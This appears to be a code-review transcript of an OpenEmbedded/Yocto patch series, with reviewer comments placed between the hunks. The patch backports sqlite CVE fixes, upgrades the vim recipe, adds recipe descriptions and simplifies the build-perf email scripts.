+ sqlite3.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/sqlite3.c b/sqlite3.c
+index f664217..33dfb78 100644
+--- a/sqlite3.c
++++ b/sqlite3.c
+@@ -28758,7 +28758,8 @@ SQLITE_API void sqlite3_str_vappendf(
+ case etSQLESCAPE: /* %q: Escape ' characters */
+ case etSQLESCAPE2: /* %Q: Escape ' and enclose in '...' */
+ case etSQLESCAPE3: { /* %w: Escape " characters */
+- int i, j, k, n, isnull;
++ i64 i, j, k, n;
++ int isnull;
+ int needQuote;
+ char ch;
+ char q = ((xtype==etSQLESCAPE3)?'"':'\''); /* Quote character */
+--
+2.25.1
+
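Review bot: The patch header says only `[PATCH] CVE-2022-35737` and gives no description of the fix, so the reason for widening `i, j, k, n` from `int` to `i64` in the `%q`/`%Q`/`%w` case has to be guessed. A one-line body would help, for example `Widen the escape-loop counters so very long string arguments cannot overflow an int.` That wording is presumed from the change and should be confirmed against the linked check-in. The case block continues outside the inner hunk, so it is also worth confirming that later uses of `j` and `n` there do not narrow the values back to `int`.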
diff --git a/meta/recipes-support/sqlite/files/CVE-2023-7104.patch b/meta/recipes-support/sqlite/files/CVE-2023-7104.patch
new file mode 100644
index 0000000000..01ff29ff5e
--- /dev/null
+++ b/meta/recipes-support/sqlite/files/CVE-2023-7104.patch
@@ -0,0 +1,46 @@
+From eab426c5fba69d2c77023939f72b4ad446834e3c Mon Sep 17 00:00:00 2001
+From: dan <Dan Kennedy>
+Date: Thu, 7 Sep 2023 13:53:09 +0000
+Subject: [PATCH] Fix a buffer overread in the sessions extension that could occur when processing a corrupt changeset.
+
+Upstream-Status: Backport [https://sqlite.org/src/info/0e4e7a05c4204b47]
+CVE: CVE-2023-7104
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ sqlite3.c | 18 +++++++++++-------
+ 1 file changed, 11 insertions(+), 7 deletions(-)
+
+diff --git a/sqlite3.c b/sqlite3.c
+index 972ef18..c645ac8 100644
+--- a/sqlite3.c
++++ b/sqlite3.c
+@@ -203301,15 +203301,19 @@ static int sessionReadRecord(
+ }
+ }
+ if( eType==SQLITE_INTEGER || eType==SQLITE_FLOAT ){
+- sqlite3_int64 v = sessionGetI64(aVal);
+- if( eType==SQLITE_INTEGER ){
+- sqlite3VdbeMemSetInt64(apOut[i], v);
++ if( (pIn->nData-pIn->iNext)<8 ){
++ rc = SQLITE_CORRUPT_BKPT;
+ }else{
+- double d;
+- memcpy(&d, &v, 8);
+- sqlite3VdbeMemSetDouble(apOut[i], d);
++ sqlite3_int64 v = sessionGetI64(aVal);
++ if( eType==SQLITE_INTEGER ){
++ sqlite3VdbeMemSetInt64(apOut[i], v);
++ }else{
++ double d;
++ memcpy(&d, &v, 8);
++ sqlite3VdbeMemSetDouble(apOut[i], d);
++ }
++ pIn->iNext += 8;
+ }
+- pIn->iNext += 8;
+ }
+ }
+ }
+--
+2.25.1
+
diff --git a/meta/recipes-support/sqlite/sqlite3.inc b/meta/recipes-support/sqlite/sqlite3.inc
index 07614bdb3e..1adc0eba66 100644
--- a/meta/recipes-support/sqlite/sqlite3.inc
+++ b/meta/recipes-support/sqlite/sqlite3.inc
@@ -1,4 +1,5 @@
SUMMARY = "Embeddable SQL database engine"
+DESCRIPTION = "A library that implements a small, fast, self-contained, high-reliability, full-featured, SQL database engine. SQLite is the most used database engine in the world. SQLite is built into all mobile phones and most computers and comes bundled inside countless other applications that people use every day"
HOMEPAGE = "http://www.sqlite.org"
SECTION = "libs"
diff --git a/meta/recipes-support/sqlite/sqlite3_3.31.1.bb b/meta/recipes-support/sqlite/sqlite3_3.31.1.bb
index c289affd60..0e7bcfa5a7 100644
--- a/meta/recipes-support/sqlite/sqlite3_3.31.1.bb
+++ b/meta/recipes-support/sqlite/sqlite3_3.31.1.bb
@@ -13,9 +13,16 @@ SRC_URI = "http://www.sqlite.org/2020/sqlite-autoconf-${SQLITE_PV}.tar.gz \
file://CVE-2020-13630.patch \
file://CVE-2020-13631.patch \
file://CVE-2020-13632.patch \
+ file://CVE-2022-35737.patch \
+ file://CVE-2020-35525.patch \
+ file://CVE-2020-35527.patch \
+ file://CVE-2021-20223.patch \
+ file://CVE-2023-7104.patch \
"
SRC_URI[md5sum] = "2d0a553534c521504e3ac3ad3b90f125"
SRC_URI[sha256sum] = "62284efebc05a76f909c580ffa5c008a7d22a1287285d68b7825a2b6b51949ae"
# -19242 is only an issue in specific development branch commits
CVE_CHECK_WHITELIST += "CVE-2019-19242"
+# This is believed to be iOS specific (https://groups.google.com/g/sqlite-dev/c/U7OjAbZO6LA)
+CVE_CHECK_WHITELIST += "CVE-2015-3717"
diff --git a/meta/recipes-support/taglib/taglib_1.11.1.bb b/meta/recipes-support/taglib/taglib_1.11.1.bb
index f4e288295d..165bccadc1 100644
--- a/meta/recipes-support/taglib/taglib_1.11.1.bb
+++ b/meta/recipes-support/taglib/taglib_1.11.1.bb
@@ -1,4 +1,5 @@
SUMMARY = "Library for reading and editing the meta-data of popular audio formats"
+DESCRIPTION = "Platform-independent library (tested on Windows/Linux) for reading and writing metadata in media files, including video, audio, and photo formats. This is a convenient one-stop-shop to present or tag all your media collection, regardless of which format/container these might use. You can read/write the standard or more common tags/properties of a media, or you can also create and retrieve your own custom tags."
SECTION = "libs/multimedia"
HOMEPAGE = "http://taglib.github.io/"
LICENSE = "LGPLv2.1 | MPL-1.1"
diff --git a/meta/recipes-support/vim/files/0001-src-Makefile-improve-reproducibility.patch b/meta/recipes-support/vim/files/0001-src-Makefile-improve-reproducibility.patch
index 63a7b78f12..2fc11dbdc2 100644
--- a/meta/recipes-support/vim/files/0001-src-Makefile-improve-reproducibility.patch
+++ b/meta/recipes-support/vim/files/0001-src-Makefile-improve-reproducibility.patch
@@ -16,11 +16,11 @@ Signed-off-by: Mingli Yu <mingli.yu@windriver.com>
src/Makefile | 14 ++++----------
1 file changed, 4 insertions(+), 10 deletions(-)
-diff --git a/src/Makefile b/src/Makefile
-index f2fafa4dc..7148d4bd9 100644
---- a/src/Makefile
-+++ b/src/Makefile
-@@ -2845,16 +2845,10 @@ auto/pathdef.c: Makefile auto/config.mk
+Index: git/src/Makefile
+===================================================================
+--- git.orig/src/Makefile
++++ git/src/Makefile
+@@ -3101,16 +3101,10 @@ auto/pathdef.c: Makefile auto/config.mk
-@echo '#include "vim.h"' >> $@
-@echo 'char_u *default_vim_dir = (char_u *)"$(VIMRCLOC)";' | $(QUOTESED) >> $@
-@echo 'char_u *default_vimruntime_dir = (char_u *)"$(VIMRUNTIMEDIR)";' | $(QUOTESED) >> $@
@@ -41,6 +41,3 @@ index f2fafa4dc..7148d4bd9 100644
-@sh $(srcdir)/pathdef.sh
GUI_GTK_RES_INPUTS = \
---
-2.17.1
-
diff --git a/meta/recipes-support/vim/files/disable_acl_header_check.patch b/meta/recipes-support/vim/files/disable_acl_header_check.patch
index 33089162b4..533138245d 100644
--- a/meta/recipes-support/vim/files/disable_acl_header_check.patch
+++ b/meta/recipes-support/vim/files/disable_acl_header_check.patch
@@ -13,11 +13,11 @@ Signed-off-by: Changqing Li <changqing.li@windriver.com>
src/configure.ac | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
-diff --git a/src/configure.ac b/src/configure.ac
-index 2d409b3ca06a..dbcaf6140263 100644
---- a/src/configure.ac
-+++ b/src/configure.ac
-@@ -3257,7 +3257,7 @@ AC_CHECK_HEADERS(stdint.h stdlib.h string.h \
+Index: git/src/configure.ac
+===================================================================
+--- git.orig/src/configure.ac
++++ git/src/configure.ac
+@@ -3292,7 +3292,7 @@ AC_CHECK_HEADERS(stdint.h stdlib.h strin
sys/systeminfo.h locale.h sys/stream.h termios.h \
libc.h sys/statfs.h poll.h sys/poll.h pwd.h \
utime.h sys/param.h sys/ptms.h libintl.h libgen.h \
@@ -26,7 +26,7 @@ index 2d409b3ca06a..dbcaf6140263 100644
sys/access.h sys/sysinfo.h wchar.h wctype.h)
dnl sys/ptem.h depends on sys/stream.h on Solaris
-@@ -3886,6 +3886,7 @@ AC_ARG_ENABLE(acl,
+@@ -3974,6 +3974,7 @@ AC_ARG_ENABLE(acl,
, [enable_acl="yes"])
if test "$enable_acl" = "yes"; then
AC_MSG_RESULT(no)
@@ -34,6 +34,3 @@ index 2d409b3ca06a..dbcaf6140263 100644
AC_CHECK_LIB(posix1e, acl_get_file, [LIBS="$LIBS -lposix1e"],
AC_CHECK_LIB(acl, acl_get_file, [LIBS="$LIBS -lacl"
AC_CHECK_LIB(attr, fgetxattr, LIBS="$LIBS -lattr",,)],,),)
---
-2.7.4
-
diff --git a/meta/recipes-support/vim/files/no-path-adjust.patch b/meta/recipes-support/vim/files/no-path-adjust.patch
index 05c2d803f6..9d6da80913 100644
--- a/meta/recipes-support/vim/files/no-path-adjust.patch
+++ b/meta/recipes-support/vim/files/no-path-adjust.patch
@@ -7,9 +7,11 @@ Upstream-Status: Pending
Signed-off-by: Joe Slater <joe.slater@windriver.com>
---- a/src/Makefile
-+++ b/src/Makefile
-@@ -2507,11 +2507,14 @@ installtools: $(TOOLS) $(DESTDIR)$(exec_
+Index: git/src/Makefile
+===================================================================
+--- git.orig/src/Makefile
++++ git/src/Makefile
+@@ -2565,11 +2565,14 @@ installtools: $(TOOLS) $(DESTDIR)$(exec_
rm -rf $$cvs; \
fi
-chmod $(FILEMOD) $(DEST_TOOLS)/*
diff --git a/meta/recipes-support/vim/files/vim-add-knob-whether-elf.h-are-checked.patch b/meta/recipes-support/vim/files/vim-add-knob-whether-elf.h-are-checked.patch
index 37914d4cd9..5284ba45b6 100644
--- a/meta/recipes-support/vim/files/vim-add-knob-whether-elf.h-are-checked.patch
+++ b/meta/recipes-support/vim/files/vim-add-knob-whether-elf.h-are-checked.patch
@@ -14,11 +14,11 @@ Signed-off-by: Changqing Li <changqing.li@windriver.com>
src/configure.ac | 7 +++++++
1 file changed, 7 insertions(+)
-diff --git a/src/configure.ac b/src/configure.ac
-index 0ee86ad..64736f0 100644
---- a/src/configure.ac
-+++ b/src/configure.ac
-@@ -3192,11 +3192,18 @@ AC_TRY_COMPILE([#include <stdio.h>], [int x __attribute__((unused));],
+Index: git/src/configure.ac
+===================================================================
+--- git.orig/src/configure.ac
++++ git/src/configure.ac
+@@ -3264,11 +3264,18 @@ AC_TRY_COMPILE([#include <stdio.h>], [in
AC_MSG_RESULT(no))
dnl Checks for header files.
@@ -37,6 +37,3 @@ index 0ee86ad..64736f0 100644
AC_HEADER_DIRENT
---
-2.7.4
-
diff --git a/meta/recipes-support/vim/vim-tiny_8.2.bb b/meta/recipes-support/vim/vim-tiny_9.0.bb
index e4c26d23f6..e4c26d23f6 100644
--- a/meta/recipes-support/vim/vim-tiny_8.2.bb
+++ b/meta/recipes-support/vim/vim-tiny_9.0.bb
diff --git a/meta/recipes-support/vim/vim.inc b/meta/recipes-support/vim/vim.inc
index 4d2886c19e..6d62bd67af 100644
--- a/meta/recipes-support/vim/vim.inc
+++ b/meta/recipes-support/vim/vim.inc
@@ -1,28 +1,37 @@
SUMMARY = "Vi IMproved - enhanced vi editor"
+DESCRIPTION = "Vim is a greatly improved version of the good old UNIX editor Vi. Many new features have been added: multi-level undo, syntax highlighting, command line history, on-line help, spell checking, filename completion, block operations, script language, etc. There is also a Graphical User Interface (GUI) available."
SECTION = "console/utils"
+HOMEPAGE = "https://www.vim.org/"
+BUGTRACKER = "https://github.com/vim/vim/issues"
+
DEPENDS = "ncurses gettext-native"
# vimdiff doesn't like busybox diff
RSUGGESTS_${PN} = "diffutils"
+
LICENSE = "vim"
-LIC_FILES_CHKSUM = "file://runtime/doc/uganda.txt;endline=287;md5=a19edd7ec70d573a005d9e509375a99a"
+LIC_FILES_CHKSUM = "file://LICENSE;md5=d1a651ab770b45d41c0f8cb5a8ca930e"
-SRC_URI = "git://github.com/vim/vim.git \
+SRC_URI = "git://github.com/vim/vim.git;branch=master;protocol=https \
file://disable_acl_header_check.patch \
file://vim-add-knob-whether-elf.h-are-checked.patch \
file://0001-src-Makefile-improve-reproducibility.patch \
file://no-path-adjust.patch \
-"
-SRCREV = "98056533b96b6b5d8849641de93185dd7bcadc44"
+ "
+
+PV .= ".2190"
+SRCREV = "6a950da86d7a6eb09d5ebeab17657986420d07ac"
# Do not consider .z in x.y.z, as that is updated with every commit
UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>\d+\.\d+)\.0"
+# Ignore that the upstream version .z in x.y.z is always newer
+UPSTREAM_VERSION_UNKNOWN = "1"
S = "${WORKDIR}/git"
VIMDIR = "vim${@d.getVar('PV').split('.')[0]}${@d.getVar('PV').split('.')[1]}"
-inherit autotools-brokensep update-alternatives mime-xdg
+inherit autotools-brokensep update-alternatives mime-xdg pkgconfig
CLEANBROKEN = "1"
@@ -31,29 +40,24 @@ do_configure () {
cd src
rm -f auto/*
touch auto/config.mk
+ # git timestamps aren't reliable, so touch the shipped .po files so they aren't regenerated
+ touch -c po/cs.cp1250.po po/ja.euc-jp.po po/ja.sjis.po po/ko.po po/pl.UTF-8.po po/pl.cp1250.po po/ru.cp1251.po po/sk.cp1250.po po/uk.cp1251.po po/zh_CN.po po/zh_CN.cp936.po po/zh_TW.po
+ # ru.cp1251.po uses CP1251 rather than cp1251, fix that
+ sed -i -e s/CP1251/cp1251/ po/ru.cp1251.po
aclocal
autoconf
cd ..
oe_runconf
touch src/auto/configure
touch src/auto/config.mk src/auto/config.h
+ # need a native tool, not a target one
+ ${BUILD_CC} src/po/sjiscorr.c -o src/po/sjiscorr
}
-do_compile() {
- # We do not support fully / correctly the following locales. Attempting
- # to use these with msgfmt in order to update the ".desktop" files exposes
- # this problem and leads to the compile failing.
- for LOCALE in cs fr ko pl sk zh_CN zh_TW;do
- echo -n > src/po/${LOCALE}.po
- done
- autotools_do_compile
-}
-
-#Available PACKAGECONFIG options are gtkgui, acl, x11, tiny
-PACKAGECONFIG ??= ""
-PACKAGECONFIG += " \
+PACKAGECONFIG ??= "\
${@bb.utils.filter('DISTRO_FEATURES', 'acl selinux', d)} \
${@bb.utils.contains('DISTRO_FEATURES', 'x11', 'x11 gtkgui', '', d)} \
+ nls \
"
PACKAGECONFIG[gtkgui] = "--enable-gui=gtk3,--enable-gui=no,gtk+3"
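Review bot: The native helper in `do_configure` is compiled with `${BUILD_CC} src/po/sjiscorr.c -o src/po/sjiscorr`, which omits the build-host compiler and linker flags that other native code receives. Passing them explicitly keeps the helper consistent with the rest of the native build: `${BUILD_CC} ${BUILD_CFLAGS} ${BUILD_LDFLAGS} src/po/sjiscorr.c -o src/po/sjiscorr`. The `touch -c` line hard-codes the list of shipped `.po` files, so a comment telling maintainers to re-check that list on each version bump would help.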
@@ -62,14 +66,18 @@ PACKAGECONFIG[x11] = "--with-x,--without-x,xt,"
PACKAGECONFIG[tiny] = "--with-features=tiny,--with-features=big,,"
PACKAGECONFIG[selinux] = "--enable-selinux,--disable-selinux,libselinux,"
PACKAGECONFIG[elfutils] = "--enable-elf-check,,elfutils,"
+PACKAGECONFIG[nls] = "--enable-nls,--disable-nls,,"
EXTRA_OECONF = " \
--disable-gpm \
--disable-gtktest \
--disable-xim \
--disable-netbeans \
+ --disable-desktop-database-update \
--with-tlib=ncurses \
+ --with-modified-by='${MAINTAINER}' \
ac_cv_small_wchar_t=no \
+ ac_cv_path_GLIB_COMPILE_RESOURCES=no \
vim_cv_getcwd_broken=no \
vim_cv_memmove_handles_overlap=yes \
vim_cv_stat_ignores_slash=no \
@@ -80,6 +88,11 @@ EXTRA_OECONF = " \
STRIP=/bin/true \
"
+# Some host distros don't have it, disable consistently
+# also disable on dunfell target builds
+EXTRA_OECONF_append_class-native = " vim_cv_timer_create=no"
+EXTRA_OECONF_append_class-target = " vim_cv_timer_create=no"
+
do_install() {
autotools_do_install
diff --git a/meta/recipes-support/vim/vim_8.2.bb b/meta/recipes-support/vim/vim_9.0.bb
index 709b6ddb55..709b6ddb55 100644
--- a/meta/recipes-support/vim/vim_8.2.bb
+++ b/meta/recipes-support/vim/vim_9.0.bb
diff --git a/meta/recipes-support/vte/vte_0.58.3.bb b/meta/recipes-support/vte/vte_0.58.3.bb
index 41dc2e77c9..50724700e8 100644
--- a/meta/recipes-support/vte/vte_0.58.3.bb
+++ b/meta/recipes-support/vte/vte_0.58.3.bb
@@ -1,4 +1,6 @@
SUMMARY = "Virtual terminal emulator GTK+ widget library"
+DESCRIPTION = "VTE provides a virtual terminal widget for GTK applications."
+HOMEPAGE = "https://wiki.gnome.org/Apps/Terminal/VTE"
BUGTRACKER = "https://bugzilla.gnome.org/buglist.cgi?product=vte"
LICENSE = "GPLv3 & LGPLv3+ & LGPLv2.1+"
LICENSE_libvte = "LGPLv3+"
diff --git a/scripts/bitbake-whatchanged b/scripts/bitbake-whatchanged
index 3095dafa46..6f4b268119 100755
--- a/scripts/bitbake-whatchanged
+++ b/scripts/bitbake-whatchanged
@@ -217,7 +217,7 @@ print what will be done between the current and last builds, for example:
# Edit the recipes
$ bitbake-whatchanged core-image-sato
-The changes will be printed"
+The changes will be printed.
Note:
The amount of tasks is not accurate when the task is "do_build" since
diff --git a/scripts/buildhistory-diff b/scripts/buildhistory-diff
index 833f7c33a5..02eedafd6e 100755
--- a/scripts/buildhistory-diff
+++ b/scripts/buildhistory-diff
@@ -11,7 +11,6 @@
import sys
import os
import argparse
-from distutils.version import LooseVersion
# Ensure PythonGit is installed (buildhistory_analysis needs it)
try:
@@ -71,10 +70,6 @@ def main():
parser = get_args_parser()
args = parser.parse_args()
- if LooseVersion(git.__version__) < '0.3.1':
- sys.stderr.write("Version of GitPython is too old, please install GitPython (python-git) 0.3.1 or later in order to use this script\n")
- sys.exit(1)
-
if len(args.revisions) > 2:
sys.stderr.write('Invalid argument(s) specified: %s\n\n' % ' '.join(args.revisions[2:]))
parser.print_help()
diff --git a/scripts/contrib/build-perf-test-wrapper.sh b/scripts/contrib/build-perf-test-wrapper.sh
index fa71d4a2e9..0a85e6e708 100755
--- a/scripts/contrib/build-perf-test-wrapper.sh
+++ b/scripts/contrib/build-perf-test-wrapper.sh
@@ -87,21 +87,10 @@ if [ $# -ne 0 ]; then
exit 1
fi
-if [ -n "$email_to" ]; then
- if ! [ -x "$(command -v phantomjs)" ]; then
- echo "ERROR: Sending email needs phantomjs."
- exit 1
- fi
- if ! [ -x "$(command -v optipng)" ]; then
- echo "ERROR: Sending email needs optipng."
- exit 1
- fi
-fi
-
# Open a file descriptor for flock and acquire lock
LOCK_FILE="/tmp/oe-build-perf-test-wrapper.lock"
if ! exec 3> "$LOCK_FILE"; then
- echo "ERROR: Unable to open lock file"
+ echo "ERROR: Unable to open loemack file"
exit 1
fi
if ! flock -n 3; then
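Review bot: The error message on the lock-open failure path has been garbled to "Unable to open loemack file", which looks like stray characters typed into the string and not an intended change. It should be restored to `echo "ERROR: Unable to open lock file"` so that operators searching logs for the lock failure still find it. On the unchanged context lines, the lock file has a fixed name under `/tmp` and is opened with a truncating redirect. On a shared build host a per-user or per-workspace directory would be a safer location, though that is outside what this hunk changes.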
@@ -226,7 +215,7 @@ if [ -n "$results_repo" ]; then
if [ -n "$email_to" ]; then
echo "Emailing test report"
os_name=`get_os_release_var PRETTY_NAME`
- "$script_dir"/oe-build-perf-report-email.py --to "$email_to" --subject "Build Perf Test Report for $os_name" --text $report_txt --html $report_html "${OE_BUILD_PERF_REPORT_EMAIL_EXTRA_ARGS[@]}"
+ "$script_dir"/oe-build-perf-report-email.py --to "$email_to" --subject "Build Perf Test Report for $os_name" --text $report_txt "${OE_BUILD_PERF_REPORT_EMAIL_EXTRA_ARGS[@]}"
fi
# Upload report files, unless we're on detached head
diff --git a/scripts/contrib/convert-srcuri.py b/scripts/contrib/convert-srcuri.py
new file mode 100755
index 0000000000..5b362ea2e8
--- /dev/null
+++ b/scripts/contrib/convert-srcuri.py
@@ -0,0 +1,77 @@
+#!/usr/bin/env python3
+#
+# Conversion script to update SRC_URI to add branch to git urls
+#
+# Copyright (C) 2021 Richard Purdie
+#
+# SPDX-License-Identifier: GPL-2.0-only
+#
+
+import re
+import os
+import sys
+import tempfile
+import shutil
+import mimetypes
+
+if len(sys.argv) < 2:
+ print("Please specify a directory to run the conversion script against.")
+ sys.exit(1)
+
+def processfile(fn):
+ def matchline(line):
+ if "MIRROR" in line or ".*" in line or "GNOME_GIT" in line:
+ return False
+ return True
+ print("processing file '%s'" % fn)
+ try:
+ if "distro_alias.inc" in fn or "linux-yocto-custom.bb" in fn:
+ return
+ fh, abs_path = tempfile.mkstemp()
+ modified = False
+ with os.fdopen(fh, 'w') as new_file:
+ with open(fn, "r") as old_file:
+ for line in old_file:
+ if ("git://" in line or "gitsm://" in line) and "branch=" not in line and matchline(line):
+ if line.endswith('"\n'):
+ line = line.replace('"\n', ';branch=master"\n')
+ elif line.endswith(" \\\n"):
+ line = line.replace(' \\\n', ';branch=master \\\n')
+ modified = True
+ if ("git://" in line or "gitsm://" in line) and "github.com" in line and "protocol=https" not in line and matchline(line):
+ if "protocol=git" in line:
+ line = line.replace('protocol=git', 'protocol=https')
+ elif line.endswith('"\n'):
+ line = line.replace('"\n', ';protocol=https"\n')
+ elif line.endswith(" \\\n"):
+ line = line.replace(' \\\n', ';protocol=https \\\n')
+ modified = True
+ new_file.write(line)
+ if modified:
+ shutil.copymode(fn, abs_path)
+ os.remove(fn)
+ shutil.move(abs_path, fn)
+ except UnicodeDecodeError:
+ pass
+
+ourname = os.path.basename(sys.argv[0])
+ourversion = "0.1"
+
+if os.path.isfile(sys.argv[1]):
+ processfile(sys.argv[1])
+ sys.exit(0)
+
+for targetdir in sys.argv[1:]:
+ print("processing directory '%s'" % targetdir)
+ for root, dirs, files in os.walk(targetdir):
+ for name in files:
+ if name == ourname:
+ continue
+ fn = os.path.join(root, name)
+ if os.path.islink(fn):
+ continue
+ if "/.git/" in fn or fn.endswith(".html") or fn.endswith(".patch") or fn.endswith(".m4") or fn.endswith(".diff"):
+ continue
+ processfile(fn)
+
+print("All files processed with version %s" % ourversion)
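Review bot: processfile() calls `tempfile.mkstemp()` for every file it opens but only moves the result into place when `modified` is set, so each unmodified file, and each one that raises UnicodeDecodeError, leaves a stray file in the default temp directory. A run over a whole layer tree can leave thousands of them. The replace step is `os.remove(fn)` followed by `shutil.move(abs_path, fn)`, so an interruption between the two loses the original file. Creating the temp file next to the target, swapping with `os.replace` and cleaning up in a `finally` covers both cases; the sketch shows only the changed lines.

```python
    # … unchanged: matchline helper, print, skip of distro_alias.inc / linux-yocto-custom.bb …
    fh, abs_path = tempfile.mkstemp(dir=os.path.dirname(fn) or ".")
    modified = False
    try:
        with os.fdopen(fh, 'w') as new_file:
            # … unchanged: open(fn) and the per-line branch= / protocol=https rewriting …
        if modified:
            shutil.copymode(fn, abs_path)
            os.replace(abs_path, fn)
    except UnicodeDecodeError:
        pass
    finally:
        # remove the temp file whenever it was not swapped into place
        if os.path.exists(abs_path):
            os.remove(abs_path)
```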
diff --git a/scripts/contrib/documentation-audit.sh b/scripts/contrib/documentation-audit.sh
index 1191f57a8e..f436f9bae0 100755
--- a/scripts/contrib/documentation-audit.sh
+++ b/scripts/contrib/documentation-audit.sh
@@ -27,7 +27,7 @@ fi
echo "REMINDER: you need to build for MACHINE=qemux86 or you won't get useful results"
echo "REMINDER: you need to set LICENSE_FLAGS_WHITELIST appropriately in local.conf or "
-echo " you'll get false positives. For example, LICENSE_FLAGS_WHITELIST = \"Commercial\""
+echo " you'll get false positives. For example, LICENSE_FLAGS_WHITELIST = \"commercial\""
for pkg in `bitbake -s | awk '{ print \$1 }'`; do
if [[ "$pkg" == "Loading" || "$pkg" == "Loaded" ||
diff --git a/scripts/contrib/oe-build-perf-report-email.py b/scripts/contrib/oe-build-perf-report-email.py
index de3862c897..7192113c28 100755
--- a/scripts/contrib/oe-build-perf-report-email.py
+++ b/scripts/contrib/oe-build-perf-report-email.py
@@ -19,8 +19,6 @@ import socket
import subprocess
import sys
import tempfile
-from email.mime.image import MIMEImage
-from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
@@ -29,30 +27,6 @@ logging.basicConfig(level=logging.INFO, format="%(levelname)s: %(message)s")
log = logging.getLogger('oe-build-perf-report')
-# Find js scaper script
-SCRAPE_JS = os.path.join(os.path.dirname(__file__), '..', 'lib', 'build_perf',
- 'scrape-html-report.js')
-if not os.path.isfile(SCRAPE_JS):
- log.error("Unableto find oe-build-perf-report-scrape.js")
- sys.exit(1)
-
-
-class ReportError(Exception):
- """Local errors"""
- pass
-
-
-def check_utils():
- """Check that all needed utils are installed in the system"""
- missing = []
- for cmd in ('phantomjs', 'optipng'):
- if not shutil.which(cmd):
- missing.append(cmd)
- if missing:
- log.error("The following tools are missing: %s", ' '.join(missing))
- sys.exit(1)
-
-
def parse_args(argv):
"""Parse command line arguments"""
description = """Email build perf test report"""
@@ -77,137 +51,19 @@ def parse_args(argv):
"the email parts")
parser.add_argument('--text',
help="Plain text message")
- parser.add_argument('--html',
- help="HTML peport generated by oe-build-perf-report")
- parser.add_argument('--phantomjs-args', action='append',
- help="Extra command line arguments passed to PhantomJS")
args = parser.parse_args(argv)
- if not args.html and not args.text:
- parser.error("Please specify --html and/or --text")
+ if not args.text:
+ parser.error("Please specify --text")
return args
-def decode_png(infile, outfile):
- """Parse/decode/optimize png data from a html element"""
- with open(infile) as f:
- raw_data = f.read()
-
- # Grab raw base64 data
- b64_data = re.sub('^.*href="data:image/png;base64,', '', raw_data, 1)
- b64_data = re.sub('">.+$', '', b64_data, 1)
-
- # Replace file with proper decoded png
- with open(outfile, 'wb') as f:
- f.write(base64.b64decode(b64_data))
-
- subprocess.check_output(['optipng', outfile], stderr=subprocess.STDOUT)
-
-
-def mangle_html_report(infile, outfile, pngs):
- """Mangle html file into a email compatible format"""
- paste = True
- png_dir = os.path.dirname(outfile)
- with open(infile) as f_in:
- with open(outfile, 'w') as f_out:
- for line in f_in.readlines():
- stripped = line.strip()
- # Strip out scripts
- if stripped == '<!--START-OF-SCRIPTS-->':
- paste = False
- elif stripped == '<!--END-OF-SCRIPTS-->':
- paste = True
- elif paste:
- if re.match('^.+href="data:image/png;base64', stripped):
- # Strip out encoded pngs (as they're huge in size)
- continue
- elif 'www.gstatic.com' in stripped:
- # HACK: drop references to external static pages
- continue
-
- # Replace charts with <img> elements
- match = re.match('<div id="(?P<id>\w+)"', stripped)
- if match and match.group('id') in pngs:
- f_out.write('<img src="cid:{}"\n'.format(match.group('id')))
- else:
- f_out.write(line)
-
-
-def scrape_html_report(report, outdir, phantomjs_extra_args=None):
- """Scrape html report into a format sendable by email"""
- tmpdir = tempfile.mkdtemp(dir='.')
- log.debug("Using tmpdir %s for phantomjs output", tmpdir)
-
- if not os.path.isdir(outdir):
- os.mkdir(outdir)
- if os.path.splitext(report)[1] not in ('.html', '.htm'):
- raise ReportError("Invalid file extension for report, needs to be "
- "'.html' or '.htm'")
-
- try:
- log.info("Scraping HTML report with PhangomJS")
- extra_args = phantomjs_extra_args if phantomjs_extra_args else []
- subprocess.check_output(['phantomjs', '--debug=true'] + extra_args +
- [SCRAPE_JS, report, tmpdir],
- stderr=subprocess.STDOUT)
-
- pngs = []
- images = []
- for fname in os.listdir(tmpdir):
- base, ext = os.path.splitext(fname)
- if ext == '.png':
- log.debug("Decoding %s", fname)
- decode_png(os.path.join(tmpdir, fname),
- os.path.join(outdir, fname))
- pngs.append(base)
- images.append(fname)
- elif ext in ('.html', '.htm'):
- report_file = fname
- else:
- log.warning("Unknown file extension: '%s'", ext)
- #shutil.move(os.path.join(tmpdir, fname), outdir)
-
- log.debug("Mangling html report file %s", report_file)
- mangle_html_report(os.path.join(tmpdir, report_file),
- os.path.join(outdir, report_file), pngs)
- return (os.path.join(outdir, report_file),
- [os.path.join(outdir, i) for i in images])
- finally:
- shutil.rmtree(tmpdir)
-
-def send_email(text_fn, html_fn, image_fns, subject, recipients, copy=[],
- blind_copy=[]):
- """Send email"""
+def send_email(text_fn, subject, recipients, copy=[], blind_copy=[]):
# Generate email message
- text_msg = html_msg = None
- if text_fn:
- with open(text_fn) as f:
- text_msg = MIMEText("Yocto build performance test report.\n" +
- f.read(), 'plain')
- if html_fn:
- html_msg = msg = MIMEMultipart('related')
- with open(html_fn) as f:
- html_msg.attach(MIMEText(f.read(), 'html'))
- for img_fn in image_fns:
- # Expect that content id is same as the filename
- cid = os.path.splitext(os.path.basename(img_fn))[0]
- with open(img_fn, 'rb') as f:
- image_msg = MIMEImage(f.read())
- image_msg['Content-ID'] = '<{}>'.format(cid)
- html_msg.attach(image_msg)
-
- if text_msg and html_msg:
- msg = MIMEMultipart('alternative')
- msg.attach(text_msg)
- msg.attach(html_msg)
- elif text_msg:
- msg = text_msg
- elif html_msg:
- msg = html_msg
- else:
- raise ReportError("Neither plain text nor html body specified")
+ with open(text_fn) as f:
+ msg = MIMEText("Yocto build performance test report.\n" + f.read(), 'plain')
pw_data = pwd.getpwuid(os.getuid())
full_name = pw_data.pw_gecos.split(',')[0]
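Review bot: The new `send_email` signature drops the `"""Send email"""` docstring the removed definition had and keeps `copy=[]` and `blind_copy=[]` as mutable default arguments. The body continues past the end of this hunk, so whether those lists are mutated cannot be seen here; `copy=None, blind_copy=None` with `copy = copy or []` inside would remove the question. I would restore a one-line docstring that says `text_fn` is now required, since `open(text_fn)` is no longer guarded by `if text_fn:`.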
@@ -234,8 +90,6 @@ def main(argv=None):
if args.debug:
log.setLevel(logging.DEBUG)
- check_utils()
-
if args.outdir:
outdir = args.outdir
if not os.path.exists(outdir):
@@ -245,25 +99,16 @@ def main(argv=None):
try:
log.debug("Storing email parts in %s", outdir)
- html_report = images = None
- if args.html:
- html_report, images = scrape_html_report(args.html, outdir,
- args.phantomjs_args)
